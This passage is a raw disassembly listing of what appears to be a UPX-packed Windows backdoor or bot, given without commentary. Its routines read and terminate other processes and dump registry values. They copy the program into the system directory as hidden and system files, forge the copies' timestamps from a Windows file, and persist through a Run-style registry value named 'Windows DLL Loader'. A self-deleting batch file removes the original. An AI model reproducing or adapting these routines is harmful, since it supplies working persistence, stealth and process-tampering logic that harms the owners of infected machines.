; sub_40637C+11E�j
push [ebp+var_1AC]
call sub_416B4C ; free
pop ecx
loc_4064AD: ; CODE XREF: sub_40637C+3B�j
push [ebp+var_1A8]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40637C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4064BF proc near ; CODE XREF: sub_40A9CF+3FF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4064D9
jmp short locret_406507
; ---------------------------------------------------------------------------
loc_4064D9: ; CODE XREF: sub_4064BF+16�j
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push offset dword_418B44
push 0
push [ebp+var_4]
push offset sub_40637C
call sub_4095A4
add esp, 10h
locret_406507: ; CODE XREF: sub_4064BF+18�j
leave
retn
sub_4064BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406509 proc near ; CODE XREF: sub_40A9CF+9C9�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
cmp [ebp+arg_4], 0
jz short loc_40651B
cmp [ebp+arg_C], 0
jnz short loc_406520
loc_40651B: ; CODE XREF: sub_406509+A�j
jmp locret_406641
; ---------------------------------------------------------------------------
loc_406520: ; CODE XREF: sub_406509+10�j
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
push [ebp+arg_8]
call sub_40A8AD
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 180h
jbe short loc_406554
mov [ebp+var_4], 180h
loc_406554: ; CODE XREF: sub_406509+42�j
mov eax, [ebp+var_4]
inc eax
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1C], eax
push [ebp+var_8]
push 0
push 10h
call ds:dword_417094 ; OpenProcess
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_406586
push [ebp+var_1C]
call sub_416B4C ; free
pop ecx
jmp locret_406641
; ---------------------------------------------------------------------------
loc_406586: ; CODE XREF: sub_406509+6D�j
and [ebp+var_14], 0
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
push [ebp+var_1C]
push [ebp+var_C]
push [ebp+var_18]
call ds:dword_417098 ; ReadProcessMemory
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz loc_40662F
cmp [ebp+var_14], 0
jz short loc_40662F
mov eax, [ebp+var_1C]
add eax, [ebp+var_4]
and byte ptr [eax], 0
and [ebp+var_20], 0
jmp short loc_4065C9
; ---------------------------------------------------------------------------
loc_4065C2: ; CODE XREF: sub_406509:loc_406620�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4065C9: ; CODE XREF: sub_406509+B7�j
mov eax, [ebp+var_20]
cmp eax, [ebp+var_14]
jnb short loc_406622
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 1Fh
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 16h
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 10h
jg short loc_406620
loc_406617: ; CODE XREF: sub_406509+D4�j
; sub_406509+E2�j ...
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
mov byte ptr [eax], 2Eh
loc_406620: ; CODE XREF: sub_406509+10C�j
jmp short loc_4065C2
; ---------------------------------------------------------------------------
loc_406622: ; CODE XREF: sub_406509+C6�j
push [ebp+var_1C]
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
loc_40662F: ; CODE XREF: sub_406509+9E�j
; sub_406509+A8�j
push [ebp+var_1C]
call sub_416B4C ; free
pop ecx
push [ebp+var_18]
call ds:dword_4170A4 ; CloseHandle
locret_406641: ; CODE XREF: sub_406509:loc_40651B�j
; sub_406509+78�j
leave
retn
sub_406509 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406643 proc near ; CODE XREF: sub_40A9CF+3D7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jnz short loc_406650
jmp short locret_40668D
; ---------------------------------------------------------------------------
loc_406650: ; CODE XREF: sub_406643+9�j
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
call ds:dword_4170E8 ; GetCurrentProcessId
cmp [ebp+var_4], eax
jnz short loc_406669
jmp short locret_40668D
; ---------------------------------------------------------------------------
loc_406669: ; CODE XREF: sub_406643+22�j
push [ebp+var_4]
push 0
push 1
call ds:dword_417094 ; OpenProcess
mov [ebp+var_8], eax
push 0
push [ebp+var_8]
call ds:dword_4170A0 ; TerminateProcess
push [ebp+var_8]
call ds:dword_4170A4 ; CloseHandle
locret_40668D: ; CODE XREF: sub_406643+B�j
; sub_406643+24�j
leave
retn
sub_406643 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40668F proc near ; CODE XREF: sub_403DF3+149�p
; sub_40A9CF+BD�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_4066A0
; ---------------------------------------------------------------------------
loc_406699: ; CODE XREF: sub_40668F+2A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066A0: ; CODE XREF: sub_40668F+8�j
cmp [ebp+var_4], 8
jge short loc_4066BB
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_406699
; ---------------------------------------------------------------------------
loc_4066BB: ; CODE XREF: sub_40668F+15�j
mov eax, [ebp+arg_0]
and byte ptr [eax+8], 0
and [ebp+var_4], 0
jmp short loc_4066CF
; ---------------------------------------------------------------------------
loc_4066C8: ; CODE XREF: sub_40668F+59�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066CF: ; CODE XREF: sub_40668F+37�j
cmp [ebp+var_4], 6
jge short loc_4066EA
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4066C8
; ---------------------------------------------------------------------------
loc_4066EA: ; CODE XREF: sub_40668F+44�j
mov eax, [ebp+arg_4]
and byte ptr [eax+6], 0
and [ebp+var_4], 0
jmp short loc_4066FE
; ---------------------------------------------------------------------------
loc_4066F7: ; CODE XREF: sub_40668F+88�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066FE: ; CODE XREF: sub_40668F+66�j
cmp [ebp+var_4], 10h
jge short loc_406719
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4066F7
; ---------------------------------------------------------------------------
loc_406719: ; CODE XREF: sub_40668F+73�j
mov eax, [ebp+arg_8]
and byte ptr [eax+10h], 0
leave
retn
sub_40668F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406722 proc near ; CODE XREF: sub_40A9CF+F40�p
var_424 = byte ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 424h
cmp [ebp+arg_4], 0
jnz short loc_406736
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406736: ; CODE XREF: sub_406722+D�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+4]
cmp eax, 5Ch
jz short loc_406747
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406747: ; CODE XREF: sub_406722+1E�j
push 4
push offset aHkcr ; "HKCR"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_406769
mov [ebp+var_218], 80000000h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_406769: ; CODE XREF: sub_406722+39�j
push 4
push offset aHkcu ; "HKCU"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40678B
mov [ebp+var_218], 80000001h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_40678B: ; CODE XREF: sub_406722+5B�j
push 4
push offset aHklm ; "HKLM"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4067AD
mov [ebp+var_218], 80000002h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_4067AD: ; CODE XREF: sub_406722+7D�j
push 4
push offset aHkus ; "HKUS"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4067CF
mov [ebp+var_218], 80000003h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_4067CF: ; CODE XREF: sub_406722+9F�j
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_4067D4: ; CODE XREF: sub_406722+45�j
; sub_406722+67�j ...
mov eax, [ebp+arg_4]
add eax, 5
mov [ebp+arg_4], eax
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_210], eax
jmp short loc_4067FB
; ---------------------------------------------------------------------------
loc_4067EE: ; CODE XREF: sub_406722:loc_406858�j
mov eax, [ebp+var_210]
dec eax
mov [ebp+var_210], eax
loc_4067FB: ; CODE XREF: sub_406722+CA�j
cmp [ebp+var_210], 0
jnz short loc_406809
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406809: ; CODE XREF: sub_406722+E0�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_210]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jnz short loc_406858
mov eax, [ebp+var_210]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
push eax
call sub_416B40 ; strlen
pop ecx
cmp eax, 200h
jb short loc_40683A
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_40683A: ; CODE XREF: sub_406722+111�j
mov eax, [ebp+var_210]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40685A
; ---------------------------------------------------------------------------
loc_406858: ; CODE XREF: sub_406722+F6�j
jmp short loc_4067EE
; ---------------------------------------------------------------------------
loc_40685A: ; CODE XREF: sub_406722+134�j
cmp [ebp+var_210], 200h
jb short loc_40686B
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_40686B: ; CODE XREF: sub_406722+142�j
push [ebp+var_210]
push [ebp+arg_4]
lea eax, [ebp+var_418]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_210]
and [ebp+eax+var_418], 0
lea eax, [ebp+var_C]
push eax
push 1
push 0
lea eax, [ebp+var_418]
push eax
push [ebp+var_218]
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jz short loc_4068B5
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_4068B5: ; CODE XREF: sub_406722+18C�j
mov [ebp+var_8], 1000h
push [ebp+var_8]
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_214], eax
lea eax, [ebp+var_8]
push eax
push [ebp+var_214]
lea eax, [ebp+var_4]
push eax
push 0
lea eax, [ebp+var_20C]
push eax
push [ebp+var_C]
call ds:dword_41700C ; RegQueryValueExA
test eax, eax
jnz loc_406A0C
cmp [ebp+var_4], 1
jz short loc_4068FF
cmp [ebp+var_4], 2
jnz short loc_406915
loc_4068FF: ; CODE XREF: sub_406722+1D5�j
push [ebp+var_214]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
loc_406915: ; CODE XREF: sub_406722+1DB�j
cmp [ebp+var_4], 4
jnz short loc_406933
mov eax, [ebp+var_214]
push dword ptr [eax]
push offset dword_418B5C
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
loc_406933: ; CODE XREF: sub_406722+1F7�j
cmp [ebp+var_4], 3
jnz loc_406A0C
push 180h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_420], eax
mov eax, [ebp+var_420]
and byte ptr [eax], 0
and [ebp+var_41C], 0
jmp short loc_40696D
; ---------------------------------------------------------------------------
loc_406960: ; CODE XREF: sub_406722+2C3�j
mov eax, [ebp+var_41C]
inc eax
mov [ebp+var_41C], eax
loc_40696D: ; CODE XREF: sub_406722+23C�j
mov eax, [ebp+var_41C]
cmp eax, [ebp+var_8]
jnb short loc_4069EA
mov eax, [ebp+var_214]
add eax, [ebp+var_41C]
movzx eax, byte ptr [eax]
push eax
push offset dword_418B54
lea eax, [ebp+var_424]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
push [ebp+var_420]
call sub_416B40 ; strlen
pop ecx
add eax, 3
cmp eax, 180h
jb short loc_4069D1
push [ebp+var_420]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
mov eax, [ebp+var_420]
and byte ptr [eax], 0
loc_4069D1: ; CODE XREF: sub_406722+28E�j
lea eax, [ebp+var_424]
push eax
push [ebp+var_420]
call sub_416B70 ; _mbscat
pop ecx
pop ecx
jmp loc_406960
; ---------------------------------------------------------------------------
loc_4069EA: ; CODE XREF: sub_406722+254�j
push [ebp+var_420]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
push [ebp+var_420]
call sub_416B4C ; free
pop ecx
loc_406A0C: ; CODE XREF: sub_406722+1CB�j
; sub_406722+215�j
push [ebp+var_214]
call sub_416B4C ; free
pop ecx
push [ebp+var_C]
call ds:dword_417028 ; RegCloseKey
locret_406A21: ; CODE XREF: sub_406722+F�j
; sub_406722+20�j ...
leave
retn
sub_406722 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A23 proc near ; CODE XREF: sub_40D043:loc_40D18D�p
; sub_40D871:loc_40DB71�p
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
push 104h
lea eax, [ebp+var_20C]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset dword_41DD14
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_104]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_20C]
push eax
call ds:dword_4170AC ; DeleteFileA
push offset dword_4182AC
lea eax, [ebp+var_20C]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_108], eax
cmp [ebp+var_108], 0
jz short locret_406AE5
push [ebp+var_108]
push 1
push 2
push offset dword_418DE0
call sub_416B7C ; fwrite
add esp, 10h
push [ebp+var_108]
call sub_416B82 ; fclose
pop ecx
lea eax, [ebp+var_20C]
push eax
call sub_406B81
pop ecx
locret_406AE5: ; CODE XREF: sub_406A23+90�j
leave
retn
sub_406A23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406AE7 proc near ; CODE XREF: sub_40D043+13D�p
; sub_40D871+2F3�p
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
push 104h
lea eax, [ebp+var_20C]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset dword_41DD14
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_104]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset aRb ; "rb"
lea eax, [ebp+var_20C]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_108], eax
cmp [ebp+var_108], 0
jz short loc_406B7D
push [ebp+var_108]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_406B7F
; ---------------------------------------------------------------------------
loc_406B7D: ; CODE XREF: sub_406AE7+83�j
xor eax, eax
locret_406B7F: ; CODE XREF: sub_406AE7+94�j
leave
retn
sub_406AE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B81 proc near ; CODE XREF: sub_406A23+BC�p
; sub_406E8E+246�p
var_120 = dword ptr -120h
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 120h
push 104h
lea eax, [ebp+var_11C]
push eax
call ds:dword_417040 ; GetWindowsDirectoryA
push offset dword_418DE8
lea eax, [ebp+var_11C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push 0
push 80h
push 3
push 0
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call ds:dword_417044 ; CreateFileA
mov [ebp+var_120], eax
cmp [ebp+var_120], 0FFFFFFFFh
jz short locret_406C4F
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_120]
call ds:dword_417048 ; GetFileTime
push [ebp+var_120]
call ds:dword_4170A4 ; CloseHandle
push 0
push 80h
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call ds:dword_417044 ; CreateFileA
mov [ebp+var_120], eax
cmp [ebp+var_120], 0FFFFFFFFh
jz short locret_406C4F
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_120]
call ds:dword_41704C ; SetFileTime
push [ebp+var_120]
call ds:dword_4170A4 ; CloseHandle
locret_406C4F: ; CODE XREF: sub_406B81+5A�j
; sub_406B81+A8�j
leave
retn
sub_406B81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C51 proc near ; CODE XREF: sub_406E8E+133�p
; sub_406E8E+214�p ...
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 108h
push 0
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call ds:dword_417014 ; RegCreateKeyExA
cmp [ebp+arg_0], 0
jz short loc_406CE1
push 104h
lea eax, [ebp+var_108]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_108]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_108]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
call ds:dword_41703C ; lstrlen
inc eax
push eax
lea eax, [ebp+var_108]
push eax
push 1
push 0
push [ebp+arg_4]
push [ebp+var_4]
call ds:dword_417010 ; RegSetValueExA
jmp short loc_406CED
; ---------------------------------------------------------------------------
loc_406CE1: ; CODE XREF: sub_406C51+30�j
push [ebp+arg_4]
push [ebp+var_4]
call ds:dword_417004 ; RegDeleteValueA
loc_406CED: ; CODE XREF: sub_406C51+8E�j
push [ebp+var_4]
call ds:dword_417028 ; RegCloseKey
leave
retn
sub_406C51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406CF8 proc near ; CODE XREF: sub_406D47+2B�p
; sub_406E8E+253�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_C], eax
and [ebp+var_4], 0
jmp short loc_406D1D
; ---------------------------------------------------------------------------
loc_406D16: ; CODE XREF: sub_406CF8:loc_406D40�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_406D1D: ; CODE XREF: sub_406CF8+1C�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jnb short loc_406D42
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jnz short loc_406D40
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax+1]
mov [ebp+var_8], eax
loc_406D40: ; CODE XREF: sub_406CF8+39�j
jmp short loc_406D16
; ---------------------------------------------------------------------------
loc_406D42: ; CODE XREF: sub_406CF8+2B�j
mov eax, [ebp+var_8]
leave
retn
sub_406CF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D47 proc near ; CODE XREF: sub_406E8E+9�p
; sub_407148+9�p
var_108 = byte ptr -108h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 108h
push 104h
lea eax, [ebp+var_108]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
lea eax, [ebp+var_108]
push eax
call sub_406CF8
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and byte ptr [eax], 0
lea eax, [ebp+var_108]
push eax
call ds:dword_417038 ; SetCurrentDirectoryA
leave
retn
sub_406D47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D90 proc near ; CODE XREF: sub_406E8E+25A�p
; sub_407148+168�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push 8
push 4
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_20], eax
and [ebp+var_1C], 0
loc_406DA8: ; CODE XREF: sub_406D90:loc_406DDF�j
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_1C]
mov [ebp+ecx+var_18], al
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnz short loc_406DDF
push offset a_bat ; ".bat"
mov eax, [ebp+var_1C]
lea eax, [ebp+eax+var_18]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_406DE1
; ---------------------------------------------------------------------------
loc_406DDF: ; CODE XREF: sub_406D90+37�j
jmp short loc_406DA8
; ---------------------------------------------------------------------------
loc_406DE1: ; CODE XREF: sub_406D90+4D�j
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
push 400h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_24], eax
lea eax, [ebp+var_18]
push eax
call ds:dword_4170AC ; DeleteFileA
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_18]
push eax
call ds:dword_417044 ; CreateFileA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_406E2B
xor eax, eax
jmp short locret_406E8C
; ---------------------------------------------------------------------------
loc_406E2B: ; CODE XREF: sub_406D90+95�j
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
push [ebp+arg_0]
push [ebp+arg_0]
push offset a@echoOffDelete ; "@echo off\r\n:deleteagain\r\ndel /A:H /F %s"...
push [ebp+var_24]
call ds:dword_4171E0 ; wsprintfA
add esp, 18h
and [ebp+var_4], 0
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+var_24]
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_24]
push [ebp+var_28]
call ds:dword_417068 ; WriteFile
push [ebp+var_28]
call ds:dword_4170A4 ; CloseHandle
push 0
push 0
push 0
lea eax, [ebp+var_18]
push eax
push offset aOpen ; "open"
push 0
call ds:dword_4171D0
push 1
pop eax
locret_406E8C: ; CODE XREF: sub_406D90+99�j
leave
retn
sub_406D90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E8E proc near ; CODE XREF: UPX0:loc_4169E1�p
var_368 = dword ptr -368h
var_338 = word ptr -338h
var_324 = byte ptr -324h
var_220 = dword ptr -220h
var_21C = byte ptr -21Ch
var_118 = byte ptr -118h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
push ebp
mov ebp, esp
sub esp, 368h
call sub_406D47
push 104h
lea eax, [ebp+var_324]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
and [ebp+var_14], 0
and [ebp+var_220], 0
jmp short loc_406ED1
; ---------------------------------------------------------------------------
loc_406EC4: ; CODE XREF: sub_406E8E:loc_406FF8�j
mov eax, [ebp+var_220]
inc eax
mov [ebp+var_220], eax
loc_406ED1: ; CODE XREF: sub_406E8E+34�j
mov eax, [ebp+var_220]
shl eax, 1
cmp ds:off_418B88[eax*4], 0
jz loc_406FFD
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
push 104h
lea eax, [ebp+var_21C]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_21C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B88[eax*4]
lea eax, [ebp+var_21C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_324]
push eax
lea eax, [ebp+var_21C]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_406FF8
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B8C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B88[eax*4]
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B8C[eax*4]
push 1
call sub_406C51
add esp, 0Ch
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105AD
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B8C[eax*4]
call sub_4105AD
pop ecx
jmp locret_407146
; ---------------------------------------------------------------------------
loc_406FF8: ; CODE XREF: sub_406E8E+E3�j
jmp loc_406EC4
; ---------------------------------------------------------------------------
loc_406FFD: ; CODE XREF: sub_406E8E+53�j
push [ebp+var_14]
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_14], eax
push 104h
lea eax, [ebp+var_118]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_118]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push ds:off_418B88[eax*4]
lea eax, [ebp+var_118]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_118]
push eax
call ds:dword_4170AC ; DeleteFileA
loc_40707C: ; DATA XREF: UPX1:0041AD4C�o
; UPX1:0041AD60�o ...
push 0
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_324]
push eax
call ds:dword_417060 ; CopyFileA
test eax, eax
jnz short loc_4070AF
push offset dword_41EBFC
push offset aWindowsDllLoad ; "Windows DLL Loader"
push 1
call sub_406C51
add esp, 0Ch
jmp locret_407146
; ---------------------------------------------------------------------------
loc_4070AF: ; CODE XREF: sub_406E8E+206�j
push 4
lea eax, [ebp+var_118]
push eax
call ds:dword_4170A8 ; SetFileAttributesA
push 2
lea eax, [ebp+var_118]
push eax
call ds:dword_4170A8 ; SetFileAttributesA
lea eax, [ebp+var_118]
push eax
call sub_406B81
pop ecx
